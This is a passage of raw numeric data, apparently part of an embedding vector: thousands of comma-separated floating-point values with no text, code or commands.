6698973,-0.03287029,0.017356528,0.0004847533,-0.009790958,-0.036455914,0.03662831,0.00014821478,0.0027117042,0.032638833,0.032130912,0.002350034,0.012372163,0.021316158,0.040886458,-0.0017845456,-0.021996735,-0.007877547,-0.0065372223,-0.0020467895,0.0117258085,-0.013340959,-0.0038185306,0.015868505,0.021625798,-0.034372058,-0.0044044764,0.0076846606,0.03205056,-0.014973883,0.009858902,0.0058737323,-0.012654677,0.035409674,-0.0064324955,0.061587468,-0.0072139124,-0.022222906,0.0047219344,0.018623184,0.011401353,-0.009723461,0.029327383,-0.03870573,0.014565782,0.0012987688,0.032566663,0.0116308825,0.008726001,-0.015054481,-0.004310622,0.013338355,0.0021474622,0.0019504965,0.011505552,-0.0016565204,-0.010921876,-0.010475961,-0.014126619,-0.008238535,0.012338143,0.017937083,-0.0077040866,-0.014984396,-0.01981227,-0.027649082,-0.0030820898,0.020397378,-0.0073322044,0.020066991,0.006701577,0.022336729,0.011816543,-0.012965295,0.026335197,-0.021844627,0.007715752,0.0017196435,0.02738543,0.014162011,-0.011814309,0.021286055,0.0021614796,0.010106667,-0.003803555,0.0068929563,0.017766837,-0.0041036783,0.008494298,-0.014654831,0.003141718,-0.007843041,0.015194638,-0.013302786,0.0125971,-0.001447636,-0.018379444,-0.014953948,-0.018601023,-0.011726591,-0.019381579,0.022157274,-0.00912125,-0.010070035,-0.030034332,0.005881365,0.015685905,-0.008150147,-0.012333919,0.010900615,0.011299967,0.0009917194,0.012231839,0.018410353,-0.014752073,-0.008930833,0.019200686,-0.007812844,-0.028476823,0.003575694,0.008300947,-0.0031366753,-0.0048071444,0.0061980886,-0.0070904302,0.0037131766,-0.0066558705,0.007782066,0.0015901722,0.022292292,0.026084637,-0.0028366311,-0.031270836,-0.006217698,0.015373193,-0.0154556995,-0.0045122844,-0.01099105,0.03704372,-0.019398313,-0.012691634,0.0011713312,-0.0021045743,0.019732125,-0.01865877,0.023015799,-0.04913023,-0.0040364414,0.0041548964,0.021127542,-0.01043582,0.030878427,0.0027964585,0.005560337,-0.007126415,0.0022922785,-0.00094565586,-0.009478559,-0.018730277,0.008247131,-0.0023467361,0.0057592015,-0.04028222,-0.016249197,-0.02934495,-0.039574984,-0.007918707,0.03513584,0.0019003702,0.01524738,0.012208044,0.019374276,-0.00054296094,-0.009676148,0.004041888,-0.030230597,0.0030414516,0.0028727541,-0.013410594,0.00041614406,0.010486276,0.0013378209,-0.013603429,-0.029623862,-0.000029200173,0.0042671557,0.006091925,-0.036974277,-0.008420317,0.006575641,-0.020610565,0.028914822,-0.013609844,0.0078273425,0.019709326,0.036048755,0.017075228,0.01242522,0.0008490659,0.012339029,-0.015784908,0.01579576,0.0032078093,0.041717682,-0.0057620103,0.0130685605,0.014389448,0.0067648813,-0.007598382,-0.020775754,0.0042532086,0.024018131,0.025895748,0.003479753,0.02280104,0.00020745001,0.022400968,0.000105171326,-0.010408296,-0.008909056,0.025175089,0.015803447,-0.01522122,0.027934458,0.0019039909,0.0136228,-0.019129302,-0.008878977,-0.013826612,0.026416223,0.023002079,-0.009076887,0.019485826,0.0073555624,-0.004419086,-0.0064276024,-0.017209008,-0.009700339,-0.006387027,-0.016301567,-0.0023310739,-0.020164998,0.012016448,-0.044318907,-0.0078137815,0.024120329,0.0014454381,0.0042923354,-0.013188878,-0.018819045,-0.013735397,-0.020615572,-0.04273794,-0.02540179,0.007989238,0.023575172,-0.041045476,-0.013110881,0.011543848,-0.009992876,0.005077645,0.008878999,-0.020747686,-0.008279591,-0.004479803,-0.017716441,0.013308958,0.02304751,0.022680411,-0.0026908393,-0.0060016266,-0.0023573607,-0.0090187155,-0.0028795593,-0.01770502,-0.009545221,0.01339126,0.011921096,0.008113529,-0.023882957,-0.03220676,-0.010430507,0.011032221,-0.024554947,-0.01140753,0.0013231138,0.025619892,0.00043215603,0.023838408,-0.020581182,0.026837636,0.024066284,-0.016429957,0.007087383,-0.008648877,0.01514983,0.03352056,0.02078439,-0.018628448,-0.03743001,-0.0064677806,0.012264892,-0.02365161,0.0097365575,0.008877158,-0.0039232606,-0.023998203,-0.019981526,-0.0027008464,-0.025549497,0.011217895,0.012045015,-0.03398487,0.02013706,-0.011101984,0.0125672445,0.020028237,-0.002867587,0.010675387,-0.002110279,0.024863089,-0.03126462,-0.019321324,0.015905887,-0.020651173,-0.0022957926,-0.00092393503,-0.03360909,-0.015219266,-0.022955539,0.020205045,-0.00071472017,0.037483644,0.01277812,0.0065188026,-0.023780476,0.0024625605,0.010189782,0.016985638,-0.027281003,-0.0069781225,-0.012316603,-0.00004369483,0.017476223,-0.00050198316,-0.022992378,0.010061977,-0.0018308804,-0.00916912,0.016878752,0.0046754433,0.013480975,-0.0074265734,0.00944754,0.009373371,-0.029995404,0.013751324,0.0027635947,-0.0074947034,0.027279632,-0.0024494322,0.0046921195,0.018333592,-0.0250382,-0.021851692,0.0008047828,0.014296832,-0.04073397,0.012053074,0.0005218715,0.009025012,-0.007956944,-0.000513448,0.024275808,0.0038206603,0.0004229868,0.026354635,0.00041340248,-0.026785681,-0.023233702,0.011046361,0.008647785,-0.0022871345,0.00037645327,0.009309012,0.007506178,0.032372948,-0.000658048,-0.013457241,0.008669155,0.0001407741,0.0046940628,0.006470012,0.0021643552,-0.011609435,-0.016636996,0.022480208,-0.030456457,-0.015201401,-0.009675036,-0.0004485877,0.0010808221,-0.020655364,-0.008002333,-0.0119366925,0.0038653894,0.017322088,-0.02252537,0.0092528965,-0.010023618,0.016334057,-0.019356465,0.014711033,0.023035012,-0.013055964,0.013092619,-0.0041656443,0.0023500177,-0.013524799,0.032021694,-0.010421304,-0.0073107975,-0.00020905085,-0.00017382724,0.014721595,0.0047503333,-0.01746581,0.021673596,0.007317424,-0.005732296,0.018743256,-0.014286987,-0.018297043,-0.0011175815,-0.0045559914,-0.010298544,-0.0074274233,0.013461921,0.016484959,-0.022021817,-0.011011978,-0.036966845,-0.059571195,0.011612048,-0.016618527,-0.032623727,-0.001661859,-0.003418412,-0.00027149616,0.020362372,0.036184136,-0.0068890434,0.021445218,0.012471199,0.014410948,0.0060418663,0.0017700063,-0.0147433905,-0.022213785,0.02637158,0.03381536,0.00054505153,0.008406123,0.0032261827,0.008896056,0.010208544,0.030987762,0.0056915423,0.00072576344,-0.006852838,-0.026744701,0.006377073,-0.008792914,0.014779833,-0.0057697734,0.0064043556,-0.020072278,-0.011141305,0.007787752,0.017510539,-0.018962309,0.005849659,-0.00399391,-0.0040874584,-0.002295684,0.03112724,0.0020909887,-0.042300776,0.002902029,-0.012024215,-0.0019640808,-0.023655826,0.023415677,-0.0041511105,0.005205138,0.029361397,-0.010228169,0.028112685,-0.002775115,0.028608607,0.015695853,0.008381729,0.0051288903,-0.00022658672,0.003063813,0.021307956,-0.032219436,-0.012169596,0.006973834,0.028050713,-0.0071436246,-0.014675052,-0.020033354,-0.008158249,-0.019427357,-0.0069912933,-0.012335625,0.026519181,-0.016657518,-0.014082274,-0.005937329,-0.008656912,-0.016315578,0.016459754,-0.01940983,-0.0057216,-0.036066007,-0.013883032,0.0034011004,-0.005254636,0.008497887,-0.0067451093,-0.01254752,0.005997479,-0.003217561,0.009286717,0.010155747,0.02687945,-0.010616651,-0.008987516,-0.0027089377,-0.0043748654,0.022301128,-0.007685432,-0.016327798,0.031622626,-0.010909343,0.0008672573,0.01057338,0.016637698,0.023143418,0.013690264,-0.022991987,0.018122204,0.0015214938,0.01845871,0.010384657,-0.0009003975,-0.004347788,0.004470235,0.03655985,0.029974544,0.012054544,-0.0036463414,0.02575391,-0.0032324132,0.019401716,-0.010261304,0.0063998266,0.0018253514,-0.018696355,0.015471179,0.0042173187,0.009598435,0.011814915,-0.014630954,0.005285224,0.011051024,-0.0035031852,-0.016619334,-0.021397365,0.014317817,-0.02274794,-0.010252852,-0.0056794495,-0.00043862316,0.011965526,-0.023731275,-0.0035301328,-0.0092975125,-0.0062276074,0.013644446,-0.011588856,-0.0072498214,0.007192443,-0.00013992155,0.0033545229,0.00228931,-0.0164351,-0.014289343,0.020090539,0.010036941,-0.00906264,-0.027658269,-0.0064374097,-0.0130694695,-0.03161853,0.008577851,-0.007683483,-0.003065856,-0.004176343,-0.011998324,0.0030721617,0.01602857,-0.01287845,0.036178302,-0.0014901424,-0.0096584605,0.016382726,0.017608976,0.0044707973,0.016887194,0.004739771,0.03481265,0.012783293,-0.005955828,0.0022519568,-0.013387566,0.0015300543,-0.0039488575,-0.021347163,-0.021779483,-0.012853407,-0.009418853,0.008028599,0.0065212604,-0.013865427,0.04236469,-0.009199765,0.04097259,-0.001637285,-0.0026897788,0.0020646302,0.027102523,0.011600091,0.01146163,-0.028604792,0.009655793,0.008770288,-0.042373843,0.0032278507,-0.0132332025,-0.008991585,-0.0011228909,0.009292457,-0.0021454939,-0.021139821,0.0037798397,-0.017292393,0.0022128264,0.008881809,-0.007049702,0.018304091,0.03575147,0.011657293,-0.004781247,0.005962687,-0.008128951,-0.0025869308,0.016768679,-0.002666449,0.0046006264,0.019684795,-0.009828847,0.03641367,0.013686804,-0.036856096,-0.004939888,-0.009278691,0.008490361,-0.013061955,-0.016593723,0.008427717,0.0056074667,0.015797993,-0.013805936,-0.007013287,0.04247869,-0.012232401,-0.009410194,0.0010040592,0.040129893,0.0022838763,0.007292739,0.00035567812,0.016692745,-0.019623794,-0.0071592047,-0.014894719,-0.031497743,-0.008520367,-0.0024767008,-0.015625132,0.0041468535,-0.012967753,-0.0041826745,-0.00953023,-0.0015234502,-0.004021387,0.023360055,0.029277915,-0.005399481,-0.0068957224,0.009571318,0.006879983,0.015339086,0.015166344,-0.0076185684,-0.01074549,-0.017273663,0.02070994,0.0017745442,0.014383426,0.004974015,-0.0035879128,-0.035026763,0.020445056,0.013401513,0.017413732,-0.0122530665,0.01589041,0.0005864258,-0.018066667,-0.012556584,0.0070838416,0.022485549,-0.0043297573,-0.0075881653,-0.005405949,-0.008645016,-0.01780786,-0.0052690664,0.07992217,-0.0016291535,0.02081043,0.00031882318,0.014962644,-0.02040267,0.0038894517,0.0013320702,0.0290864,-0.023496214,-0.027880179,-0.027867755,0.007112808,-0.019756813,0.015476555,-0.00060119474,-0.0043224827,-0.0024666165,0.0021293657,0.021166902,0.00053592067,-0.0033670315,0.0037893422,0.012944954,-0.008136508,0.0036293392,0.01897693,-0.018404726,0.022520442,-0.023476506,0.010175975,-0.019527651,0.009935726,0.007760156,-0.0057559307,-0.001358172,0.018030299,-0.015265335,-0.010129942,0.014855074,-0.0036509256,-0.011193527,0.047772408,0.0023855686,0.0028116477,-0.011032433,-0.011424436,-0.007021564,0.010731039,-0.003650835,0.012308425,-0.01940119,-0.01850216,0.0040513,-0.032688435,0.01691655,0.005559189,0.021552935,0.028505936,-0.009911785,0.009829089,0.014092747,0.0075267944,-0.008365685,-0.015530327,-0.004872497,0.004908692,-0.01982424,0.040032033,-0.011112946,-0.0030618594,0.0020172368,-0.0007174573,0.008081269,0.004994612,0.008093325,0.0064095734,-0.010351443,-0.023551723,-0.004979716,-0.0044593527,-0.0030210954,0.03657452,0.015456202,-0.010771334,0.008985268,0.004416118,-0.00061209354,0.07464202,0.029580591,0.031589177,-0.014408147,-0.0071105463,0.027077846,0.019999731,0.021602377,-0.011140534,0.0077719213,-0.026990771,0.01914049,0.009969288,0.011877078,0.01122549,-0.013566967,-0.0025571603,0.0007434996,0.007509239,-0.014546359,0.013521462,0.034840457,0.02540749,0.01113325,-0.0067155953,0.01625028,0.005842975,-0.00039166375,0.0019441049,-0.018889979,-0.0074470066,0.036907375,0.014362087,0.010267144,-0.018236626,-0.043596644,0.0065495046,0.14899692,-0.0032557696,0.0008226461,0.021665296,-0.009850301,0.0033338086,-0.13052611,-0.0070451517,0.011079596,-0.010561825,0.0027549255,-0.00007242545,-0.013459939,0.011784165,0.0012669684,0.0024086288,-0.004633552,-0.008924119,0.014005204,-0.014963521,0.0017720903,0.006940383,-0.020622877,0.0060827415,-0.018137565,-0.0148137575,0.01777891,-0.012018905,-0.008192151,-0.015135976,0.010944307,-0.002818478,0.009778689,-0.0079682795,-0.019309804,0.010213516,0.013391875,-0.0031966425,-0.007158561,-0.016249549,0.0052570566,-0.00787916,-0.027008858,-0.028287973,-0.16929795,0.014428968,-0.011181774,-0.046576116,0.024610119,0.0027624255,0.009326187,0.018937757,0.015536179,0.013333618,-0.0024145308,0.032517087,-0.00475557,-0.012986081,-0.02629592,-0.007916225,-0.003635865,0.006446111,0.005006909,-0.0016785477,0.021755867,-0.0040365453,-0.031764824,-0.017069193,-0.03591436,0.005926607,0.012608806,0.031635176,-0.000530992,0.007539043,-0.017722419,0.0021046167,-0.008102346,0.010660776,0.008562903,-0.018812684,-0.016758628,0.005018548,-0.01924133,0.016543314,-0.010708964,-0.00061804056,0.00527517,-0.0003981614,0.0049969167,0.005010385,0.015905363,0.019573735,0.025606873,0.008430739,0.023507759,0.015943725,-0.018858409,0.012990096,-0.000358523,0.0073591494,-0.003144335,-0.03674048,-0.016785063,0.015512817,-0.005897702,-0.007620381,-0.013347562,-0.0038798787,0.017520042,-0.00981208,0.023069259,-0.035155836,-0.0015739889,0.013215329,-0.0047896365,-0.004859696,-0.014943168,-0.019545905,0.013376048,0.017720085,-0.0046044406,-0.008296335,0.015431059,-0.017497843,-0.0027685321,-0.029130213,-0.006062198,-0.022417102,0.011213146,-0.013426976,-0.0011909212,-0.009748792,-0.005302216,-0.0009169751,0.024978373,-0.008109294,0.013019841,0.0065160613,0.0017734392,0.01541719,0.034792125,-0.009523593,-0.014517978,0.008462205,0.008397747,-0.019401146,-0.009967971,0.011636531,-0.009691925,0.0013137022,-0.0040555806,0.0013253519,-0.012308832,0.0032024647,0.0065778256,-0.0193916,0.02367032,-0.01306425,-0.038213737,-0.028914444,0.0135494815,0.005126047,0.018691322,-0.0024576162,-0.034586485,0.004756144,0.012003841,0.0073506534,0.04685243,0.016413046,-0.02423827,-0.010300385,0.00009739267,0.014874169,-0.039704002,0.005029821,-0.0018119497,0.014638235,-0.007050089,-0.0016712234,-0.019647174,0.012530594,-0.020033576,-0.008807885,-0.0010409569,0.012014083,0.015157251,-0.0010930994,0.0064169224,-0.023129633,0.041059572,-0.014259448,0.0146416575,0.0026399351,0.000016318472,0.023516204,-0.01911604,-0.037806943,0.0027824345,0.07932939,-0.0021251487,-0.015453541,0.012965312,-0.008974815,0.022754101,0.022185834,-0.006091818,-0.022573858,-0.012135395,-0.023885649,-0.004125102,-0.002727525,0.015886012,-0.018068315,0.02286362,0.021246873,0.0041756774,-0.0059623136,0.006637653,0.014795647,-0.025190845,-0.012999011,0.01693466,-0.0028699774,0.015495112,0.01967917,0.007028529,-0.00657915,-0.006791075,-0.010376731,-0.018735979,-0.021450559,0.0068877116,0.012244431,-0.04752363,-0.01906275,0.005699891,0.009872614,-0.020906324,0.010532526,0.014837577,0.022750255,-0.020530123,0.0092109,-0.027964136,-0.014659613,0.00091511034,0.0070242453,-0.007001602,0.006063751,0.013792808,0.0005653035,-0.005293246,0.011883352,-0.004593577,0.0015706791,-0.016785888,-0.00353633,-0.012292145,0.027857553,-0.00806588,-0.02862857,0.013676497,-0.006617195,0.0024875037,-0.013471211,-0.021787804,0.010005696,0.025993329,-0.013964517,-0.009698637,-0.015965424,0.009354598,-0.0070619434,-0.010616259,-0.0067597963,-0.011040147,0.008297781,0.028938144,0.008155089,0.015689472,0.0005637798,-0.0017876112,-0.011791646,-0.047887802,-0.003924817,0.038115803,-0.025676658,0.0056531094,0.0140259825,-0.007281468,0.0036916398,-0.0044300817,0.022529056,0.008858546,0.0116431005,-0.0027695296,0.029727176,-0.01397427,0.0057652313,0.0067116786,-0.0028092135,-0.014282737,0.01501044,-0.010576496,-0.0056751254,0.006204688,0.024590053,-0.011088564,0.0030796223,-0.017963236,0.013250449,-0.030678561,-0.010345952,0.05133912,-0.00031689488,0.028680427,0.023644783,-0.008365682,-0.016399829,-0.006786501,0.004120921,-0.017158438,0.0041903183,-0.016573818,0.010422088,0.008821838,-0.029082388,0.016475396,-0.016274301,0.029095702,0.015697809,-0.017103573,-0.016032944,-0.0035282015,0.028488323,0.007612865,0.013391064,0.024642363,-0.0059590405,-0.019564008,-0.009397398,-0.0038571465,-0.014380389,0.008360696,0.009309378,-0.005568906,-0.03103122,-0.0016734654,-0.016300589,0.006496325,-0.013283275,0.0014437898,0.013520468,0.02909731,-0.008889224,-0.014183966,0.002408018,-0.014568325,0.0083619645,0.036829527,0.013343421,-0.015565923,-0.021205753,0.014458082,0.03468668,0.003055328,0.015472725,0.0025551175,-0.010968503,-0.022996085,0.0048874174,0.00026813976,0.0015348602,-0.010666368,0.0050711976,0.004095376,0.005575992,-0.012219298,0.016363014,0.010380155,0.008140601,0.0028753446,-0.0095473435,0.025462374,0.0073676175,0.03226483,-0.011219058,0.0019017528,-0.005581467,-0.0014286252,-0.00982421,-0.0010984538,-0.03034891,-0.022510571,0.02518722,-0.024598248,0.008274449,0.001158037,0.00660934,0.014624,-0.013134867,-0.012085906,-0.0026052974,-0.0034375344,-0.0013577938,-0.024112457,0.0027613305,-0.014228208,-0.014361032,0.0021062028,-0.011172555,0.0066389833,-0.0032218976,-0.0061056823,0.011603925,0.02008472,0.00031566457,-0.021851528,0.0072441595,-0.009928302,-0.013974241,-0.0035159758,-0.007929976,-0.011478551,-0.023840137,0.061203692,-0.018410014,-0.0031033624,-0.00069632253,0.03722939,0.019299697,-0.01352314,0.01156384,-0.016333407,-0.031814665,-0.0009794073,-0.03870413,0.01404633,-0.008247296,-0.027951349,-0.008085736,0.018420093,-0.014571173,-0.001686657,-0.0030240333,0.0034495252,-0.008903912,0.032465678,-0.0041389214,-0.00973723,-0.05126286,-0.010635075,0.011018432,-0.029037947,0.0026382538,0.011206579,-0.018326312,-0.018465921,-0.0014589217,-0.01890782,-0.009419829,0.019734902,-0.007647642,-0.003117214,0.009761795,0.025060942,-0.005953739,0.004579985,0.020027522,-0.005056998,-0.029541314,0.00083389366,-0.004275973,-0.01886869,0.00733553,-0.012665278,-0.0059963986,0.014958464,0.019905549,-0.020785654,0.010760449,0.017546507,0.0028686423,-0.0010001499,0.005007469,0.004953685,-0.0023698471,-0.03249167,-0.009479809,0.0076644924,0.0031139136,-0.018777011,-0.022966947,-0.019137494,-0.0010549027,-0.009788828,0.021094013,0.010600902,0.02096486,0.004620303,-0.009869692,0.017099947,-0.0101269735,0.00091363234,0.025684007,-0.003825739,0.017057674,-0.003796562,-0.014954346,-0.0028985068,0.0065780547,-0.007243604,0.0033335285,-0.00006264723,0.015900863,0.055216577,-0.000585013,0.0018678972,-0.011725253,-0.0030317763,0.003163938,-0.00689141,-0.017020276,-0.006033904,-0.021401517,-0.017520592,0.012673908,-0.01109913,-0.009559082,-0.016226359,-0.012216296,-0.11610171,0.0073455996,-0.010580282,-0.021161053,0.001896113,-0.007059197,0.010177499,0.040683888,0.007372737,-0.044068445,-0.016797781,0.012940891,0.008790489,0.0031833525,0.005475751,0.0071737,-0.023037475,-0.010727522,-0.016229197,0.021193698,0.01395859,-0.013045157,0.010746154,-0.006320433,0.007555115,0.016609767,-0.010694652,0.028185327,0.007483542,0.018034028,-0.008018875,0.0018356227,0.0150238145,0.021519981,0.0014506889,0.011698029,-0.0054388745,0.012349693,0.0053896154,0.010423964,-0.00046485002,-0.0140781645,0.0015862151,-0.006517811,0.03492505,-0.0059104585,0.006169991,0.02615435,0.02485687,0.027651448,-0.016027067,-0.006779487,0.0048217517,-0.0034575814,-0.01606689,-0.031856988,-0.0006215214,-0.0027547246,0.01102062,0.0071890173,-0.014243529,-0.008897724,-0.0015027621,0.0026324608,0.0028088314,0.010665901,0.0068629966,0.004619147,-0.018929794,0.000038163784,-0.011194629,0.0077856816,-0.008274678,0.007643003,0.014533895,0.005738149,-0.0049835327,0.003194985,-0.02274898,0.009820641,-0.031040985,-0.0056711286,-0.0120181255,0.01597604,-0.009239325,-0.029192057,0.006862894,0.022286033,-0.02723337,0.014128168,0.004216995,-0.0043453863,-0.008233134,-0.01268788,-0.010750934,0.028450405,-0.0140550835,0.016504865,-0.008844092,0.005120434,-0.017829726,0.0008277733,-0.011062319,-0.03249226,-0.12073282,-0.018849196,0.016063787,-0.013835858,-0.001180656,-0.01682472,0.013562987,-0.0064557255,0.0366434,0.012726015,0.002019911,0.013584028,-0.018008148,-0.0035821523,0.0014751048,0.0003416352,-0.03160489,0.007294486,-0.0023143063,-0.00206463,-0.014634136,-0.020052154,0.00031102725,0.008150068,0.0042198175,0.0077155503,0.000541235,0.026887387,0.033227824,-0.0077052047,-0.0017047992,0.015332934,-0.0045551653,0.008796722,-0.022166595,0.016138835,0.007542935,-0.016448129,-0.0021397425,0.023811944,0.0068927454,0.0032893773,0.014583,0.02061489,-0.0040854192,0.004656361,-0.0028743611,0.011418617,0.0062427227,-0.0075847385,0.0034191392,0.0036922088,-0.004425812,0.0034551849,-0.025826365,-0.019887654,-0.009500872,0.016260613,0.0060938722,0.008100924,-0.008848876,0.0029842854,-0.016991567,0.012115401,-0.0047992845,0.012204903,-0.01969967,0.0005740278,0.0010335615,0.0129359355,-0.0014613359,0.025074558,0.006784856,-0.008868483,0.024501925,0.012070756,0.01739372,0.0322563,0.015223747,-0.012756333,0.006422956,-0.018463312,0.010744985,0.012425702,-0.021851812,0.007912026,0.0066159014,-0.009948853,-0.015872631,0.021962684,0.017732326,0.000025563208,-0.011069846,0.013762852,0.009209672,0.013119912,0.052051578,0.00046904178,-0.015756372,-0.0027015412,-0.013619555,-0.006814494,-0.016167954,0.0047946637,-0.024999173,0.017234193,0.0299366,0.018329835,-0.005515188,-0.0031466798,-0.009061822,0.015986659,-0.012832641,-0.008317054,0.008985031,-0.008955814,-0.010147547,0.007966526,-0.012033093,-0.005163263,0.012969665,0.007796336,0.009855692,-0.016777815,0.005409457,-0.0078807715,-0.014725314,0.009547392,-0.016542733,-0.039474726,0.001003661,0.0010557169,0.005251144,-0.019308211,-0.001180316,0.011405639,-0.023227984,0.0038793546,0.0148391565,0.011861202,0.009110308,-0.009655665,-0.015515863,-0.0034074583,-0.0029707993,0.0042522578,-0.021214092,0.011313617,-0.010488245,0.0059388704,0.013916534,-0.013907578,0.025534237,0.018990107,0.014148124,0.0049533024,-0.019319123,0.014845669,0.0055540293,0.009298764,0.005242116,0.024296837,0.016582482,0.01066281,-0.00061423384,-0.017593123,0.0021626519,0.003357006,-0.0053631105,0.009175667,0.01173539,-0.0012603719,0.0030403591,-0.053648822,0.015303545,0.025100652,-0.0018663743,0.010830719,0.030659124,0.023912853,-0.015333602,-0.007366605,-0.013734529,-0.006762024,-0.00079916744,0.0219212,-0.0055492395,-0.0011866591,-0.012014866,-0.012404955,0.02512572,-0.001261896,-0.0108646415,-0.010779208,0.019056553,0.00034251314,0.0010870389,0.012112153,0.0176105,-0.016742412,-0.023821352,0.02202511,0.007989846,-0.021927409,-0.0067951973,-0.0011390995,0.0033022577,0.025164418,0.009264849,-0.018509008,-0.024211915,0.012391976,-0.0021268965,-0.0006112233,0.013825897,-0.003938014,0.0026873848,-0.01162373,0.014338018,0.009033492,0.0037969577,-0.014954322,0.018059654,-0.0045303144,-0.002957865,0.017748097,0.00236908,0.010189708,-0.033392616,-0.015798667,0.010815791,0.018800216,-0.015619805,-0.004235707,0.01376503,-0.022761082,0.017876921,-0.0021043152,0.017963318,0.008790114,0.032164395,0.027331976,0.031054255,0.029511264,0.016373787,-0.010189048,0.0061249775,0.008524025,0.022143003,0.037289996,0.009883069,-0.009903515,-0.000932631,-0.0020180116,-0.0034487722,0.0022317995,0.005847805,0.013804924,-0.002576254,0.024217218,-0.007918755,-0.02030449,-0.0077286256,-0.027642045,-0.002753712,-0.0009947597,0.00035988976,-0.023038214,-0.0042479485,0.007398372,0.009081609,-0.0008465795,-0.000027170303,0.028851913,-0.015096769,-0.008452243,-0.0039354623,0.013287946,0.008089253,0.0044158683,-0.0033502849,-0.006588968,-0.007834184,0.011877854,-0.0049442593,0.010191001,0.0001170435,0.0055642817,0.0049708057,-0.01639307,0.0018845082,-0.0019408849,-0.0023969093,-0.018364461,-0.011368377,0.01999802,-0.0038367196,-0.0012142131,0.0019816756,0.0036277855,0.004501383,-0.000042430558,-0.006443441,-0.006706706,0.0100438725,-0.015879028,-0.01054267,0.025359599,-0.00870289,-0.0032526646,-0.023522789,0.013555731,0.00027219363,0.005354289,0.006992605,-0.0011248093,0.0039665666,0.0033489924,-0.047576223,-0.024519116,-0.00917704,-0.015152268,0.007088382,-0.018648256,0.0062264055,0.0059935204,0.017461853,0.035604674,-0.0068681026,0.0026049856,0.025880016,0.00086164713,-0.011001053,0.0055004316,0.018766448,-0.007871739,0.01716354,0.03154959,-0.016535053,0.013095348,0.00079138303,0.001057248,0.0081667695,0.0037074848,0.016650366,0.014252325,-0.004718545,0.0062982896,0.016750298,-0.012586008,-0.00039718693,0.0037493259,-0.004715228,-0.008903922,-0.014631606,0.0151015455,-0.028685153,-0.012625389,-0.0036826688,-0.005314828,-0.012499776,0.0047065686,-0.0074377856,0.0016127159,0.0045349463,-0.011701532,-0.019575084,0.014540614,-0.02489756,0.0068217865,-0.019305091,0.012156634,-0.016338829,-0.030534027,0.0032492771,-0.09168885,0.005777694,0.034154695,0.0035529966,0.06664734,0.020116527,-0.021958323,-0.012900083,-0.003241233,0.012674988,0.007301038,-0.002978099,-0.029904239,0.009850697,0.02722493,-0.0064630187,-0.002203422,0.013433396,-0.0030960517,-0.03226422,0.0074023255,0.012692978,-0.018266218,-0.005752669,0.013710208,0.0069705443,-0.0028360737,-0.010774206,0.0028900262,-0.0020370951,-0.019915335,-0.00122425,0.0059826686,-0.00023570184,-0.01387009,0.009189014,-0.011712097,0.015364645,-0.024689002,-0.03450356,0.002240435,0.025608966,-0.0063822824,0.00089971104,-0.013593694,0.013962424,-0.035010863,-0.02335119,-0.010444712,0.0019106,-0.0083623845,0.014834187,0.019246161,0.01423803,-0.00337642,0.014540204,-0.0025487572,-0.012734945,0.022537334,0.0022599068,-0.009341105,0.010594848,-0.00033031526,-0.018901788,0.0050643897,0.0062802113,-0.0020480666,0.016040748,-0.008620086,0.00957247,0.0028893217,-0.04207615,-0.008749423,-0.014959209,0.0031156316,0.006253025,0.006265164,-0.017509703,-0.007965435,0.010903393,0.036053903,-0.018293519,0.016970051,-0.004466346,0.01461813,0.019363195,0.0010208117,-0.013607676,0.013081368,-0.010593205,-0.019327508,-0.0022918736,0.03163852,0.0056427377,0.008957208,0.0091574695,-0.0036777188,0.0038721764,-0.010000593,0.008950645,0.011618156,0.008130612,-0.0032858932,0.012077122,-0.018694205,-0.0010554185,0.0047714575,-0.014521074,-0.0068869577,-0.0011716984,-0.008602404,0.015728084,0.027739244,0.03903878,0.028299447,0.006059384,0.009780471,0.009989135,-0.0052088015,-0.039702617,-0.01755379,-0.011271253,-0.0138749285,0.04004057,0.01026049,-0.011745501,0.018330319,-0.011458119,-0.020661816,0.01854028,0.0012569323,0.033335812,0.020397004,0.0010577634,-0.025192285,0.0019191066,-0.014390836,0.023114689,0.013197725,0.031879507,-0.005464004,-0.04260991,0.013074952,-0.000058917267,-0.026721088,0.025578128,-0.022253552,-0.005681019,0.0027592394,-0.0077569513,-0.0140783135,0.007720719,0.00067194283,0.0047066757,0.001814679,0.00007938172,0.008856152,0.00526993,-0.02762729,0.0099582365,-0.012807108,0.0034784721,-0.004004107,0.0029713882,-0.03225654,0.0068036034,0.011994501,-0.0039719357,-0.016619511,-0.020179262,-0.011264267,-0.015813943,-0.00010792036,0.000018140929,-0.038068917,-0.009450088,0.01940694,0.019519221,-0.015360732,-0.0063099484,-0.016689112,0.013069956,-0.0012484392,-0.020786902,-0.015837697,-0.00997839,-0.0013615584,-0.01230185,0.0101125715,-0.0037594333,0.00063982606,-0.005262855,0.000073114235,-0.018923074,0.005953052,-0.016666112,0.009445265,-0.0026120283,-0.01739177,0.019002536,-0.012955484,0.0038322865,-0.022792645,0.027306871,0.027530601,0.021775387,-0.0074088206,0.019134719,-0.015335506,-0.005739778,-0.00612653,0.008014755,0.007734408,0.13874602,-0.0017505384,-0.016162422,0.018302014,-0.00084914226,-0.0025194008,0.015341792,-0.010871628,-0.010682682,0.0032593324,0.028831918,-0.006885532,0.0010366446,-0.008048363,0.004603136,0.029294398,0.01469376,-0.025689255,0.005096379,0.00092922343,0.02808982,-0.02607605,-0.013178,-0.042688813,-0.0142392805,-0.0766448,0.02946239,0.017130503,0.0032718985,0.024288695,0.0064745047,-0.008704397,0.00006910907,0.019702645,-0.014450916,0.010731342,0.005265516,-0.017289413,-0.0027286853,-0.027177064,0.017044919,-0.006372963,0.0038553022,-0.0095987,-0.025614098,-0.021225845,0.003538956,-0.01072166,-0.011561978,-0.016238255,0.00984966,-0.009027416,0.0032260725,-0.013440785,0.008481393,-0.012245299,-0.0018124473,-0.0016568347,0.0034931253,-0.0029571804,0.010568714,-0.0032753004,0.010625528,-0.0025197726,0.030316481,0.0003603949,-0.0054877354,-0.0323573,0.008509481,-0.00586972,0.015195763,-0.017131241,0.0041546747,-0.007581173,-0.0057601742,0.013201054,-0.005639681,-0.010535081,-0.004878881,-0.0061799753,-0.002231764,-0.010966755,0.020991122,0.017889662,0.008787222,-0.0021885214,-0.006340448,0.013131113,0.0025867256,-0.0036502918,-0.029002585,0.02629244,0.026074372,0.010184751,-0.008778907,0.00007734636,0.016316626,-0.0005147572,-0.0011329056,-0.0035002301,-0.017588334,-0.0020508533,-0.000987628,0.014543854,-0.0009709936,0.0029072033,-0.009926642,0.026943827,-0.00065894634,-0.0010561043,0.00497136,0.010880083,-0.001845037,0.011329329,-0.0001231135,0.029473888,-0.025088407,-0.00343433,0.0010667602,-0.019761583,-0.013868775,0.016086595,0.0011634373,0.035777792,0.